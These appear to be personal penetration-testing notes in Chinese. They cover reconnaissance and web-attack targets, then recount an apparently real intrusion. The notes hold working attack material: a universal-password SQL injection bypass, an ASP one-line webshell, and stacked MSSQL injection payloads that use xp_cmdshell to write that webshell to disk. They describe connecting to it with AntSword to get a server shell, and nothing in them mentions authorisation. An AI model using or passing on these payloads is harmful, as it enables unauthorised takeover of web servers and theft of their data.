滲透流程
信息收集
1.IP信息
17CE
看是否存在cdn
存在的話,查找真實ip
- 從國外去訪問,查看ip信息
- 去掉www,然後查看ip信息
2.旁站信息
-
站長之家
3.C段信息
-
站長之家
4.子域名信息
- layer子域名挖掘機
- subdomain
5.端口信息
- nmap
- portscan
6.網站目錄信息
- dirsearch
- dirb
目的是擴大攻擊面,尋找防護薄弱點和可利用信息
尋找可能存在漏洞的地方
-
登陸界面 可能存在sql注入,可以先使用admin’ or 1=1 --+ 之類的語句嘗試繞過
-
搜索界面 可能存在sql注入和存儲型和DOM型xss等
-
上傳界面 可以上傳一些木馬之類東西:
eg:上傳一句話木馬,然後使用中國蟻劍去連接(中國菜刀沒有中國蟻劍好用!!)
-
涉及密碼或者其它敏感信息的地方 可以進行抓包分析,查看請求包和響應包,看一下有沒有什麼可以利用的信息,或者有可以修改的參數之類的東西,如果有進行修改,理解每個參數的意義和變化
一次成功的經驗
收集信息發現子域名信息,找到一個可以利用的ip,進行端口掃描和網站目錄爆破,發現後臺管理界面,嘗試萬能密碼進行繞過,成功,裏面沒有什麼可以利用的信息,然後尋找上傳接口,然後發現可以從登陸界面上傳文件,
一句話木馬:
<%execute(request("kxc"))%>
mysql開啓存儲過程
exec master..xp_cmdshell
echo中使用^轉義特殊字符
ss' ;exec master..xp_cmdshell "echo dfvdf > D:\\KEFU\\a.asp"; --+
定義一個變量,然後將變量輸入到文件中
sa';declare @cmd sysname set @cmd = 'echo ^<^%execute^(request^("kxc"^)^)^%^> > D:\KEFU\1.asp' exec master..xp_cmdshell @cmd;--+
然後使用中國蟻劍連接,可以獲得服務器shell